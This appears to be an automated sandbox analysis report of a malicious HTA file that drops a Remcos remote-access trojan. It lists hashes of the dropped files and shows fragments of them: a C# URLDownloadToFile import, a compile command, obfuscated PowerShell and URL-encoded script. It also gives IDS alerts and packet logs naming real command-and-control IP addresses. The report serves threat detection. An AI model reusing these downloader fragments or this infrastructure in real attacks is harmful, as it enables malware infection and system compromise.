Malicious: false
Preview: .using System;.using System.Runtime.InteropServices;..namespace tdiNXtrg.{. public class YP. {. [DllImport("UrLMOn", CharSet = CharSet.Unicode)]public static extern IntPtr URLDownloadToFile(IntPtr rm,string BiIFqNkjl,string BFhsGR,uint HMJhhu,IntPtr xkB);.. }..}.

Process: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type: Unicode text, UTF-8 (with BOM) text, with very long lines (366), with no line terminators
Category: dropped
Size (bytes): 369
Entropy (8bit): 5.236935345075532
Encrypted: false
SSDEEP: 6:pAu+H2LvkuqJDdqxLTKbDdqB/6K2wkn23fvGlrGR0zxs7+AEszIwkn23fvGlrGrn:p37Lvkmb6KRfnGlrGWWZEifnGlrGr
MD5: 92A9E264434F47B7C70B73D6871B58A6
SHA1: BC22F8E51015B2E0B5EF86515A6D7B08A88F0D27
SHA-256: C3F23B0F6633CBCB1F9B34D6E49C20A8DF8219528760BEA14CF77DFBC0F9F097
SHA-512: FA3A8B963B2342F4ECC9E6A4C72420F539CA913E1C1ED06BFC4447820EE794CAF0AD0E584C11E3F7F06B185245B833BD5F38A7D68726E977674507A719CAFEDF
Malicious: true
Preview: ./t:library /utf8output /R:"System.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /R:"System.Core.dll" /out:"C:\Users\user\AppData\Local\Temp\r1df4acf\r1df4acf.dll" /debug- /optimize+ /warnaserror /optimize+ "C:\Users\user\AppData\Local\Temp\r1df4acf\r1df4acf.0.cs"

Process: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
File Type: PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category: dropped
Size (bytes): 3072
Entropy (8bit): 2.813178194418042
Encrypted: false
SSDEEP: 24:etGSfPBu5exl8OlItkWWaNm6EtkZfDgmdcrwjcUWI+ycuZhN2oakSn9PNnq:6Ysx+Ol07NmoJDgmd4wA31ul2oa3nnq
MD5: F0F1A327180C777E0DDEAD3BBBA7C2E9
SHA1: FB57EAEED2C92D56E8DD4874B9F194E49C70860C
SHA-256: FCCB8B5869FFEE8989CD8084252C8CAB4BCDDE67BE0886C7303E8C736A76FDE2
SHA-512: 7740BEB735AA53BF2D762EA4C68C231A7C78E395F0D33C4D1A4F23C35898D49988A551F41E16344D295CE320D4F5433959A2FD0BF46BB0E158CE9E841F7B901B
Malicious: false
Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....._g...........!.................#... ...@....... ....................................@.................................T#..W....@.......................`....................................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................#......H.......X ................................................................(....*BSJB............v4.0.30319......l.......#~..........#Strings............#US.........#GUID.......L...#Blob...........G.........%3............................................................3.,.....q.....q.......................................... :.....P ......L.........R.....U....._.....f.....m...L.....L...!.L.....L.......!.....*.......:.......................................#..........<Module>.r1

Process: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type: Unicode text, UTF-8 (with BOM) text, with very long lines (446), with CRLF, CR line terminators
Category: modified
Size (bytes): 867
Entropy (8bit): 5.309667439195098
Encrypted: false
SSDEEP: 24:KJBqd3ka6KRfnGlrGnEifnGlrGqKax5DqBVKVrdFAMBJTH:Cika6CnGJGnEunGJGqK2DcVKdBJj
MD5: DA1BB970BD2878E8A2A1F8D25EFD2B3F
SHA1: 0FEF7564B215E1B43D540E6D28E7E88CFB0B9C00
SHA-256: BD7426D8D70FA1C021EF57F98475C5ABA434E74347845579A5B73C1BB1421666
SHA-512: 40BF7D5F15BA989F3A5B8AC0253D053A3691EE76651DD69CADE03B9163FD3780CFA60C41ABEC53763BBBC5CCA9DD4A445A9791A4866A021982A4123457DE88A5
Malicious: false
Preview: .C:\Users\user\Desktop> "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /t:library /utf8output /R:"System.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /R:"System.Core.dll" /out:"C:\Users\user\AppData\Local\Temp\r1df4acf\r1df4acf.dll" /debug- /optimize+ /warnaserror /optimize+ "C:\Users\user\AppData\Local\Temp\r1df4acf\r1df4acf.0.cs"......Microsoft (R) Visual C# Compiler version 4.8.4084.0...for C# 5..Copyright (C) Microsoft Corporation. All rights reserved.......This compiler is provided as part of the Microsoft (R) .NET Framework, but only supports language versions up to C# 5, which is no longer the latest version. For compilers that support newer versions of the C# programming language, see http://go.microsoft.com/fwlink/?LinkID=533240....

Process: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type: Unicode text, UTF-16, little-endian text, with very long lines (3454), with CRLF line terminators
Category: dropped
Size (bytes): 154352
Entropy (8bit): 3.8134053941949806
Encrypted: false
SSDEEP: 3072:XNGVWmRC28eTt1DzYSyEgNGVWmRC28eTt1DzYSygNGVWmRC28eTt1DzYSy+:9q9t1DzYSKq9t1DzYSPq9t1DzYSN
MD5: 2E124153BE958647E84566B305ECF94E
SHA1: D7D06FE6314EE8E4C31A971872632477EDE38248
SHA-256: 5B5835CEBCC79AE42D3EDC11DDCA5E2F6C4BF333E78D1B2D0733A091A9FD887E
SHA-512: 9BB7F048CFA817E406D63AFFC034EA89F7BEB6DD584521D5B1A531A032E22470BB9E9C8A12931B5838A77267ACF5FE64E8E788CAEE49C014348B75925614E450
Malicious: true
Preview: ...... . . . .....N.g.p.H.G.G.o.p.q.f.z.b.u.I.i. .=. .".I.G.s.P.e.U.L.G.G.R.C.h.o.K.K.".....N.i.o.i.W.T.O.N.a.B.C.G.k.R.l. .=. .".q.W.G.k.Z.C.K.S.u.A.K.Z.H.C.C.".....s.L.k.q.r.P.L.L.W.P.d.O.L.z.A. .=. .".W.m.K.e.G.I.K.N.u.W.u.c.k.a.z.".........l.o.P.k.H.L.o.k.K.m.L.s.B.L.W. .=. .".i.U.W.K.i.p.L.I.K.t.u.i.p.W.N.".....A.i.U.u.K.n.k.d.b.K.R.L.P.L.u. .=. .".A.L.A.N.c.L.A.P.J.z.t.W.W.u.I.".....L.m.L.h.e.W.t.c.a.h.t.G.K.k.t. .=. .".R.C.Z.b.q.U.x.k.i.a.W.o.P.e.p.".....k.L.n.R.A.o.h.x.o.U.m.t.O.l.Q. .=. .".i.k.G.K.I.l.L.U.j.a.B.G.m.R.A.".....W.p.x.U.C.l.c.H.A.t.L.G.O.L.p. .=. .".j.C.P.u.R.o.c.B.S.W.G.o.W.i.K.".....Z.Z.W.c.G.i.f.I.O.o.x.s.O.u.G. .=. .".t.B.z.b.m.t.i.p.N.U.A.L.K.A.i.".....L.r.d.W.U.L.l.b.P.i.o.t.x.i.U. .=. .".L.W.I.A.x.L.L.i.m.c.a.L.P.A.t.".....p.k.Z.q.l.P.p.p.L.t.i.n.i.h.k. .=. .".p.L.k.t.b.C.U.L.L.P.L.d.p.G.A.".....l.Z.c.L.c.q.c.O.z.m.i.p.p.U.A. .=. .".G.x.G.H.W.C.T.z.x.Z.k.z.t.i.c.".....P.k.K.c.C.R.o.P.J.c.W.L.W.R.k. .=. .".N.W.h.t.N.b.p.U.x.R.O.b.a.x.q.".....o.S.d.K.b.J.Z.H.

File type: HTML document, ASCII text, with very long lines (65450), with CRLF line terminators
Entropy (8bit): 2.6377005909084796
TrID:
File name: clearentirethingwithbestnoticetheeverythinggooodfrome.hta
File size: 147'751 bytes
MD5: 5215d83b478d7a718062863c5efbbeeb
SHA1: 9ac735295a8b3bc10740d50669f6fa5c81ae10ce
SHA256: af6c6b710e9a4c5e2d8b53642779548a4edcd528cd7e5714c6ac9d69f38efb80
SHA512: b1ea72019653fa7858aa1b6ad1fa3fcf6974ade703be0edd55f891030706fc675425e5f1372dc3a61671dff5e40e6baceba019af60711cd65a248f7cecbca915
SSDEEP: 768:t1EZFxaTOum2oum2M5KUJDVUKhCbGVf/AMF9woN83WkkA7MhrkK0IHj66666666l:tg
TLSH: BCE35027D5DB943C65E7BEBBF71CBF2B1183AD05EC8985CB095C4A900DD2A8E7234984
File Content Preview: <Script Language='Javascript'>.. HTML Encryption provided by tufat.com -->.. ..document.write(unescape('%3C%68%74%6D%6C%3E%0A%3C%68%65%61%64%3E%0A%3C%2F%68%65%61%64%3E%0A%3C%62%6F%64%79%3E%0A%0A%3C%73%63%72%69%70%74%20%74%79%70%65%3D%22%74%65%78%74

Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol
2024-12-16T07:12:04.055751+0100 | 2858795 | ETPRO MALWARE ReverseLoader Payload Request (GET) M2 | 1 | 192.168.2.4 | 49730 | 192.3.122.159 | 80 | TCP
2024-12-16T07:12:32.099411+0100 | 2841075 | ETPRO MALWARE Terse Request to paste .ee - Possible Download | 1 | 192.168.2.4 | 49738 | 172.67.187.200 | 443 | TCP
2024-12-16T07:12:32.511096+0100 | 2020424 | ET EXPLOIT_KIT Unknown EK Landing Feb 16 2015 b64 2 M1 | 1 | 172.67.187.200 | 443 | 192.168.2.4 | 49738 | TCP
2024-12-16T07:12:32.511096+0100 | 2020425 | ET EXPLOIT_KIT ReverseLoader Base64 Payload Inbound M2 | 1 | 172.67.187.200 | 443 | 192.168.2.4 | 49738 | TCP
2024-12-16T07:12:33.462037+0100 | 2858295 | ETPRO MALWARE ReverseLoader Base64 Encoded EXE With Content-Type Mismatch (text/plain) | 1 | 172.67.187.200 | 443 | 192.168.2.4 | 49738 | TCP
2024-12-16T07:12:35.200213+0100 | 2036594 | ET JA3 Hash - Remcos 3.x/4.x TLS Connection | 1 | 192.168.2.4 | 49739 | 107.173.143.31 | 14646 | TCP
2024-12-16T07:12:37.309488+0100 | 2036594 | ET JA3 Hash - Remcos 3.x/4.x TLS Connection | 1 | 192.168.2.4 | 49740 | 107.173.143.31 | 14646 | TCP
2024-12-16T07:12:37.593144+0100 | 2803304 | ETPRO MALWARE Common Downloader Header Pattern HCa | 3 | 192.168.2.4 | 49741 | 178.237.33.50 | 80 | TCP

Timestamp | Source Port | Dest Port | Source IP | Dest IP
Dec 16, 2024 07:12:02.811033964 CET | 49730 | 80 | 192.168.2.4 | 192.3.122.159
Dec 16, 2024 07:12:02.930974007 CET | 80 | 49730 | 192.3.122.159 | 192.168.2.4
Dec 16, 2024 07:12:02.931102037 CET | 49730 | 80 | 192.168.2.4 | 192.3.122.159
Dec 16, 2024 07:12:02.946059942 CET | 49730 | 80 | 192.168.2.4 | 192.3.122.159
Dec 16, 2024 07:12:03.065874100 CET | 80 | 49730 | 192.3.122.159 | 192.168.2.4
Dec 16, 2024 07:12:04.055463076 CET | 80 | 49730 | 192.3.122.159 | 192.168.2.4
Dec 16, 2024 07:12:04.055512905 CET | 80 | 49730 | 192.3.122.159 | 192.168.2.4
Dec 16, 2024 07:12:04.055597067 CET | 80 | 49730 | 192.3.122.159 | 192.168.2.4
Dec 16, 2024 07:12:04.055632114 CET | 80 | 49730 | 192.3.122.159 | 192.168.2.4
Dec 16, 2024 07:12:04.055665016 CET | 80 | 49730 | 192.3.122.159 | 192.168.2.4
Dec 16, 2024 07:12:04.055717945 CET | 80 | 49730 | 192.3.122.159 | 192.168.2.4
Dec 16, 2024 07:12:04.055751085 CET | 80 | 49730 | 192.3.122.159 | 192.168.2.4
Dec 16, 2024 07:12:04.055751085 CET | 49730 | 80 | 192.168.2.4 | 192.3.122.159
Dec 16, 2024 07:12:04.055751085 CET | 49730 | 80 | 192.168.2.4 | 192.3.122.159
Dec 16, 2024 07:12:04.055785894 CET | 80 | 49730 | 192.3.122.159 | 192.168.2.4
Dec 16, 2024 07:12:04.055819035 CET | 80 | 49730 | 192.3.122.159 | 192.168.2.4
Dec 16, 2024 07:12:04.055824995 CET | 49730 | 80 | 192.168.2.4 | 192.3.122.159
Dec 16, 2024 07:12:04.055849075 CET | 49730 | 80 | 192.168.2.4 | 192.3.122.159
Dec 16, 2024 07:12:04.055856943 CET | 80 | 49730 | 192.3.122.159 | 192.168.2.4
Dec 16, 2024 07:12:04.057879925 CET | 49730 | 80 | 192.168.2.4 | 192.3.122.159
Dec 16, 2024 07:12:04.176161051 CET | 80 | 49730 | 192.3.122.159 | 192.168.2.4
Dec 16, 2024 07:12:04.176227093 CET | 80 | 49730 | 192.3.122.159 | 192.168.2.4
Dec 16, 2024 07:12:04.181869984 CET | 49730 | 80 | 192.168.2.4 | 192.3.122.159
Dec 16, 2024 07:12:04.248517036 CET | 80 | 49730 | 192.3.122.159 | 192.168.2.4
Dec 16, 2024 07:12:04.248706102 CET | 80 | 49730 | 192.3.122.159 | 192.168.2.4
Dec 16, 2024 07:12:04.248792887 CET | 49730 | 80 | 192.168.2.4 | 192.3.122.159
Dec 16, 2024 07:12:04.248924971 CET | 49730 | 80 | 192.168.2.4 | 192.3.122.159
                                                                                                                Dec 16, 2024 07:12:04.251727104 CET8049730192.3.122.159192.168.2.4
                                                                                                                Dec 16, 2024 07:12:04.251840115 CET8049730192.3.122.159192.168.2.4
                                                                                                                Dec 16, 2024 07:12:04.251873970 CET4973080192.168.2.4192.3.122.159
                                                                                                                Dec 16, 2024 07:12:04.252224922 CET4973080192.168.2.4192.3.122.159
                                                                                                                Dec 16, 2024 07:12:04.260248899 CET8049730192.3.122.159192.168.2.4
                                                                                                                Dec 16, 2024 07:12:04.260600090 CET8049730192.3.122.159192.168.2.4
                                                                                                                Dec 16, 2024 07:12:04.260656118 CET4973080192.168.2.4192.3.122.159
                                                                                                                Dec 16, 2024 07:12:04.261643887 CET4973080192.168.2.4192.3.122.159
                                                                                                                Dec 16, 2024 07:12:04.268579006 CET8049730192.3.122.159192.168.2.4
                                                                                                                Dec 16, 2024 07:12:04.268975019 CET8049730192.3.122.159192.168.2.4
                                                                                                                Dec 16, 2024 07:12:04.269021988 CET4973080192.168.2.4192.3.122.159
                                                                                                                Dec 16, 2024 07:12:04.272151947 CET4973080192.168.2.4192.3.122.159
                                                                                                                Dec 16, 2024 07:12:04.276951075 CET8049730192.3.122.159192.168.2.4
                                                                                                                Dec 16, 2024 07:12:04.277304888 CET8049730192.3.122.159192.168.2.4
                                                                                                                Dec 16, 2024 07:12:04.277487040 CET4973080192.168.2.4192.3.122.159
                                                                                                                Dec 16, 2024 07:12:04.281733990 CET4973080192.168.2.4192.3.122.159
                                                                                                                Dec 16, 2024 07:12:04.285413027 CET8049730192.3.122.159192.168.2.4
                                                                                                                Dec 16, 2024 07:12:04.285695076 CET8049730192.3.122.159192.168.2.4
                                                                                                                Dec 16, 2024 07:12:04.292874098 CET4973080192.168.2.4192.3.122.159
                                                                                                                Dec 16, 2024 07:12:04.294598103 CET8049730192.3.122.159192.168.2.4
                                                                                                                Dec 16, 2024 07:12:04.294632912 CET8049730192.3.122.159192.168.2.4
                                                                                                                Dec 16, 2024 07:12:04.296175957 CET4973080192.168.2.4192.3.122.159
                                                                                                                Dec 16, 2024 07:12:04.302129984 CET8049730192.3.122.159192.168.2.4
                                                                                                                Dec 16, 2024 07:12:04.302310944 CET8049730192.3.122.159192.168.2.4
                                                                                                                Dec 16, 2024 07:12:04.308300018 CET4973080192.168.2.4192.3.122.159
                                                                                                                Dec 16, 2024 07:12:04.310544014 CET8049730192.3.122.159192.168.2.4
                                                                                                                Dec 16, 2024 07:12:04.310652018 CET8049730192.3.122.159192.168.2.4
                                                                                                                Dec 16, 2024 07:12:04.310858965 CET4973080192.168.2.4192.3.122.159
                                                                                                                Dec 16, 2024 07:12:04.320061922 CET8049730192.3.122.159192.168.2.4
                                                                                                                Dec 16, 2024 07:12:04.320261955 CET8049730192.3.122.159192.168.2.4
                                                                                                                Dec 16, 2024 07:12:04.320445061 CET4973080192.168.2.4192.3.122.159
                                                                                                                Dec 16, 2024 07:12:04.325134039 CET4973080192.168.2.4192.3.122.159
                                                                                                                Dec 16, 2024 07:12:04.328495979 CET8049730192.3.122.159192.168.2.4
                                                                                                                Dec 16, 2024 07:12:04.328685045 CET8049730192.3.122.159192.168.2.4
                                                                                                                Dec 16, 2024 07:12:04.328903913 CET4973080192.168.2.4192.3.122.159
                                                                                                                Dec 16, 2024 07:12:04.328903913 CET4973080192.168.2.4192.3.122.159
                                                                                                                Dec 16, 2024 07:12:04.440855980 CET8049730192.3.122.159192.168.2.4
                                                                                                                Dec 16, 2024 07:12:04.440948009 CET4973080192.168.2.4192.3.122.159
                                                                                                                Dec 16, 2024 07:12:04.442655087 CET8049730192.3.122.159192.168.2.4
                                                                                                                Dec 16, 2024 07:12:04.442831039 CET4973080192.168.2.4192.3.122.159
                                                                                                                Dec 16, 2024 07:12:04.445159912 CET8049730192.3.122.159192.168.2.4
                                                                                                                Dec 16, 2024 07:12:04.445174932 CET8049730192.3.122.159192.168.2.4
                                                                                                                Dec 16, 2024 07:12:04.445245981 CET4973080192.168.2.4192.3.122.159
                                                                                                                Dec 16, 2024 07:12:04.445246935 CET4973080192.168.2.4192.3.122.159
                                                                                                                Dec 16, 2024 07:12:04.453457117 CET8049730192.3.122.159192.168.2.4
                                                                                                                Dec 16, 2024 07:12:04.453531981 CET4973080192.168.2.4192.3.122.159
                                                                                                                Dec 16, 2024 07:12:04.453648090 CET8049730192.3.122.159192.168.2.4
                                                                                                                Dec 16, 2024 07:12:04.453818083 CET4973080192.168.2.4192.3.122.159
                                                                                                                Dec 16, 2024 07:12:04.461910009 CET8049730192.3.122.159192.168.2.4
                                                                                                                Dec 16, 2024 07:12:04.462084055 CET4973080192.168.2.4192.3.122.159
                                                                                                                Dec 16, 2024 07:12:04.462110996 CET8049730192.3.122.159192.168.2.4
                                                                                                                Dec 16, 2024 07:12:04.462174892 CET4973080192.168.2.4192.3.122.159
                                                                                                                Dec 16, 2024 07:12:04.470276117 CET8049730192.3.122.159192.168.2.4
                                                                                                                Dec 16, 2024 07:12:04.470346928 CET4973080192.168.2.4192.3.122.159
                                                                                                                Dec 16, 2024 07:12:04.470463037 CET8049730192.3.122.159192.168.2.4
                                                                                                                Dec 16, 2024 07:12:04.470520020 CET4973080192.168.2.4192.3.122.159
                                                                                                                Dec 16, 2024 07:12:04.477685928 CET8049730192.3.122.159192.168.2.4
                                                                                                                Dec 16, 2024 07:12:04.477780104 CET4973080192.168.2.4192.3.122.159
                                                                                                                Dec 16, 2024 07:12:04.477786064 CET8049730192.3.122.159192.168.2.4
                                                                                                                Dec 16, 2024 07:12:04.477865934 CET4973080192.168.2.4192.3.122.159
                                                                                                                Dec 16, 2024 07:12:04.486062050 CET8049730192.3.122.159192.168.2.4
                                                                                                                Dec 16, 2024 07:12:04.486115932 CET4973080192.168.2.4192.3.122.159
                                                                                                                Dec 16, 2024 07:12:04.486179113 CET8049730192.3.122.159192.168.2.4
                                                                                                                Dec 16, 2024 07:12:04.486227036 CET4973080192.168.2.4192.3.122.159
                                                                                                                Dec 16, 2024 07:12:04.494472980 CET8049730192.3.122.159192.168.2.4
                                                                                                                Dec 16, 2024 07:12:04.494545937 CET4973080192.168.2.4192.3.122.159
                                                                                                                Dec 16, 2024 07:12:04.494590044 CET8049730192.3.122.159192.168.2.4
                                                                                                                Dec 16, 2024 07:12:04.494653940 CET4973080192.168.2.4192.3.122.159
                                                                                                                Dec 16, 2024 07:12:04.502871037 CET8049730192.3.122.159192.168.2.4
                                                                                                                Dec 16, 2024 07:12:04.502933979 CET4973080192.168.2.4192.3.122.159
                                                                                                                Dec 16, 2024 07:12:04.503010988 CET8049730192.3.122.159192.168.2.4
                                                                                                                Dec 16, 2024 07:12:04.503061056 CET4973080192.168.2.4192.3.122.159
                                                                                                                Dec 16, 2024 07:12:04.511255980 CET8049730192.3.122.159192.168.2.4
                                                                                                                Dec 16, 2024 07:12:04.511337042 CET4973080192.168.2.4192.3.122.159
                                                                                                                Dec 16, 2024 07:12:04.511403084 CET8049730192.3.122.159192.168.2.4
                                                                                                                Dec 16, 2024 07:12:04.511459112 CET4973080192.168.2.4192.3.122.159
                                                                                                                Dec 16, 2024 07:12:04.517206907 CET8049730192.3.122.159192.168.2.4
                                                                                                                Dec 16, 2024 07:12:04.517277002 CET4973080192.168.2.4192.3.122.159
                                                                                                                Dec 16, 2024 07:12:04.517491102 CET8049730192.3.122.159192.168.2.4
                                                                                                                Dec 16, 2024 07:12:04.517548084 CET4973080192.168.2.4192.3.122.159
                                                                                                                Dec 16, 2024 07:12:04.523176908 CET8049730192.3.122.159192.168.2.4
                                                                                                                Dec 16, 2024 07:12:04.523399115 CET4973080192.168.2.4192.3.122.159
                                                                                                                Dec 16, 2024 07:12:04.523488045 CET8049730192.3.122.159192.168.2.4
                                                                                                                Dec 16, 2024 07:12:04.523770094 CET4973080192.168.2.4192.3.122.159
                                                                                                                Dec 16, 2024 07:12:04.529125929 CET8049730192.3.122.159192.168.2.4
                                                                                                                Dec 16, 2024 07:12:04.529309034 CET4973080192.168.2.4192.3.122.159
                                                                                                                Dec 16, 2024 07:12:04.529481888 CET8049730192.3.122.159192.168.2.4
                                                                                                                Dec 16, 2024 07:12:04.529540062 CET4973080192.168.2.4192.3.122.159
                                                                                                                Dec 16, 2024 07:12:04.535079002 CET8049730192.3.122.159192.168.2.4
                                                                                                                Dec 16, 2024 07:12:04.535341978 CET4973080192.168.2.4192.3.122.159
                                                                                                                Dec 16, 2024 07:12:04.535424948 CET8049730192.3.122.159192.168.2.4
                                                                                                                Dec 16, 2024 07:12:04.535475016 CET4973080192.168.2.4192.3.122.159
                                                                                                                Dec 16, 2024 07:12:04.541433096 CET8049730192.3.122.159192.168.2.4
                                                                                                                Dec 16, 2024 07:12:04.541449070 CET8049730192.3.122.159192.168.2.4
                                                                                                                Dec 16, 2024 07:12:04.541620970 CET4973080192.168.2.4192.3.122.159
                                                                                                                Dec 16, 2024 07:12:04.541620970 CET4973080192.168.2.4192.3.122.159
                                                                                                                Dec 16, 2024 07:12:04.548093081 CET8049730192.3.122.159192.168.2.4
                                                                                                                Dec 16, 2024 07:12:04.548127890 CET8049730192.3.122.159192.168.2.4
                                                                                                                Dec 16, 2024 07:12:04.548170090 CET4973080192.168.2.4192.3.122.159
                                                                                                                Dec 16, 2024 07:12:04.548171043 CET4973080192.168.2.4192.3.122.159
                                                                                                                Dec 16, 2024 07:12:04.553953886 CET8049730192.3.122.159192.168.2.4
                                                                                                                Dec 16, 2024 07:12:04.554016113 CET4973080192.168.2.4192.3.122.159
                                                                                                                Dec 16, 2024 07:12:04.554128885 CET8049730192.3.122.159192.168.2.4
                                                                                                                Dec 16, 2024 07:12:04.554186106 CET4973080192.168.2.4192.3.122.159
                                                                                                                Dec 16, 2024 07:12:04.559957981 CET8049730192.3.122.159192.168.2.4
                                                                                                                Dec 16, 2024 07:12:04.560034990 CET4973080192.168.2.4192.3.122.159
                                                                                                                Dec 16, 2024 07:12:04.560076952 CET8049730192.3.122.159192.168.2.4
                                                                                                                Dec 16, 2024 07:12:04.560129881 CET4973080192.168.2.4192.3.122.159
                                                                                                                Dec 16, 2024 07:12:04.565912008 CET8049730192.3.122.159192.168.2.4
                                                                                                                Dec 16, 2024 07:12:04.565979004 CET4973080192.168.2.4192.3.122.159
                                                                                                                Dec 16, 2024 07:12:04.566049099 CET8049730192.3.122.159192.168.2.4
                                                                                                                Dec 16, 2024 07:12:04.566099882 CET4973080192.168.2.4192.3.122.159
                                                                                                                Dec 16, 2024 07:12:04.571787119 CET8049730192.3.122.159192.168.2.4
                                                                                                                Dec 16, 2024 07:12:04.571851015 CET4973080192.168.2.4192.3.122.159
                                                                                                                Dec 16, 2024 07:12:04.571929932 CET8049730192.3.122.159192.168.2.4
                                                                                                                Dec 16, 2024 07:12:04.571983099 CET4973080192.168.2.4192.3.122.159
                                                                                                                Dec 16, 2024 07:12:04.576857090 CET8049730192.3.122.159192.168.2.4
                                                                                                                Dec 16, 2024 07:12:04.576945066 CET4973080192.168.2.4192.3.122.159
                                                                                                                Dec 16, 2024 07:12:04.633488894 CET8049730192.3.122.159192.168.2.4
                                                                                                                Dec 16, 2024 07:12:04.633615971 CET8049730192.3.122.159192.168.2.4
                                                                                                                Dec 16, 2024 07:12:04.633706093 CET4973080192.168.2.4192.3.122.159
                                                                                                                Dec 16, 2024 07:12:04.633706093 CET4973080192.168.2.4192.3.122.159
                                                                                                                Dec 16, 2024 07:12:04.636416912 CET8049730192.3.122.159192.168.2.4
                                                                                                                Dec 16, 2024 07:12:04.636432886 CET8049730192.3.122.159192.168.2.4
                                                                                                                Dec 16, 2024 07:12:04.636475086 CET4973080192.168.2.4192.3.122.159
                                                                                                                Dec 16, 2024 07:12:04.636512995 CET4973080192.168.2.4192.3.122.159
                                                                                                                Dec 16, 2024 07:12:04.641076088 CET8049730192.3.122.159192.168.2.4
                                                                                                                Dec 16, 2024 07:12:04.641100883 CET8049730192.3.122.159192.168.2.4
                                                                                                                Dec 16, 2024 07:12:04.641151905 CET4973080192.168.2.4192.3.122.159
                                                                                                                Dec 16, 2024 07:12:04.641185999 CET4973080192.168.2.4192.3.122.159
                                                                                                                Dec 16, 2024 07:12:04.646894932 CET8049730192.3.122.159192.168.2.4
                                                                                                                Dec 16, 2024 07:12:04.646912098 CET8049730192.3.122.159192.168.2.4
                                                                                                                Dec 16, 2024 07:12:04.647092104 CET4973080192.168.2.4192.3.122.159
                                                                                                                Dec 16, 2024 07:12:04.647092104 CET4973080192.168.2.4192.3.122.159
                                                                                                                Dec 16, 2024 07:12:04.652596951 CET8049730192.3.122.159192.168.2.4
                                                                                                                Dec 16, 2024 07:12:04.652677059 CET4973080192.168.2.4192.3.122.159
                                                                                                                Dec 16, 2024 07:12:04.652698040 CET8049730192.3.122.159192.168.2.4
                                                                                                                Dec 16, 2024 07:12:04.652756929 CET4973080192.168.2.4192.3.122.159
                                                                                                                Dec 16, 2024 07:12:04.658463955 CET8049730192.3.122.159192.168.2.4
                                                                                                                Dec 16, 2024 07:12:04.658555031 CET4973080192.168.2.4192.3.122.159
                                                                                                                Dec 16, 2024 07:12:04.658576012 CET8049730192.3.122.159192.168.2.4
                                                                                                                Dec 16, 2024 07:12:04.658644915 CET4973080192.168.2.4192.3.122.159
                                                                                                                Dec 16, 2024 07:12:04.664325953 CET8049730192.3.122.159192.168.2.4
                                                                                                                Dec 16, 2024 07:12:04.664530039 CET4973080192.168.2.4192.3.122.159
                                                                                                                Dec 16, 2024 07:12:04.664557934 CET8049730192.3.122.159192.168.2.4
                                                                                                                Dec 16, 2024 07:12:04.664613008 CET4973080192.168.2.4192.3.122.159
                                                                                                                Dec 16, 2024 07:12:04.670303106 CET8049730192.3.122.159192.168.2.4
                                                                                                                Dec 16, 2024 07:12:04.670497894 CET8049730192.3.122.159192.168.2.4
                                                                                                                Dec 16, 2024 07:12:04.670527935 CET4973080192.168.2.4192.3.122.159
                                                                                                                Dec 16, 2024 07:12:04.670624018 CET4973080192.168.2.4192.3.122.159
                                                                                                                Dec 16, 2024 07:12:04.676091909 CET8049730192.3.122.159192.168.2.4
                                                                                                                Dec 16, 2024 07:12:04.676173925 CET4973080192.168.2.4192.3.122.159
                                                                                                                Dec 16, 2024 07:12:04.676273108 CET8049730192.3.122.159192.168.2.4
                                                                                                                Dec 16, 2024 07:12:04.676328897 CET4973080192.168.2.4192.3.122.159
                                                                                                                Dec 16, 2024 07:12:04.681936026 CET8049730192.3.122.159192.168.2.4
                                                                                                                Dec 16, 2024 07:12:32.723669052 CET44349738172.67.187.200192.168.2.4
                                                                                                                Dec 16, 2024 07:12:32.723767042 CET49738443192.168.2.4172.67.187.200
                                                                                                                Dec 16, 2024 07:12:32.726147890 CET44349738172.67.187.200192.168.2.4
                                                                                                                Dec 16, 2024 07:12:32.726246119 CET49738443192.168.2.4172.67.187.200
                                                                                                                Dec 16, 2024 07:12:32.730274916 CET44349738172.67.187.200192.168.2.4
                                                                                                                Dec 16, 2024 07:12:32.730484009 CET49738443192.168.2.4172.67.187.200
                                                                                                                Dec 16, 2024 07:12:32.733385086 CET44349738172.67.187.200192.168.2.4
                                                                                                                Dec 16, 2024 07:12:32.733474970 CET49738443192.168.2.4172.67.187.200
                                                                                                                Dec 16, 2024 07:12:32.735970974 CET44349738172.67.187.200192.168.2.4
                                                                                                                Dec 16, 2024 07:12:32.736032963 CET49738443192.168.2.4172.67.187.200
                                                                                                                Dec 16, 2024 07:12:32.739120960 CET44349738172.67.187.200192.168.2.4
                                                                                                                Dec 16, 2024 07:12:32.739178896 CET49738443192.168.2.4172.67.187.200
                                                                                                                Dec 16, 2024 07:12:32.742475033 CET44349738172.67.187.200192.168.2.4
                                                                                                                Dec 16, 2024 07:12:32.742553949 CET49738443192.168.2.4172.67.187.200
                                                                                                                Dec 16, 2024 07:12:32.744189024 CET44349738172.67.187.200192.168.2.4
                                                                                                                Dec 16, 2024 07:12:32.744333982 CET49738443192.168.2.4172.67.187.200
                                                                                                                Dec 16, 2024 07:12:32.747170925 CET44349738172.67.187.200192.168.2.4
                                                                                                                Dec 16, 2024 07:12:32.747226954 CET49738443192.168.2.4172.67.187.200
                                                                                                                Dec 16, 2024 07:12:32.748971939 CET44349738172.67.187.200192.168.2.4
                                                                                                                Dec 16, 2024 07:12:32.749032021 CET49738443192.168.2.4172.67.187.200
                                                                                                                Dec 16, 2024 07:12:32.752165079 CET44349738172.67.187.200192.168.2.4
                                                                                                                Dec 16, 2024 07:12:32.752221107 CET49738443192.168.2.4172.67.187.200
                                                                                                                Dec 16, 2024 07:12:32.755287886 CET44349738172.67.187.200192.168.2.4
                                                                                                                Dec 16, 2024 07:12:32.755354881 CET49738443192.168.2.4172.67.187.200
                                                                                                                Dec 16, 2024 07:12:32.794513941 CET44349738172.67.187.200192.168.2.4
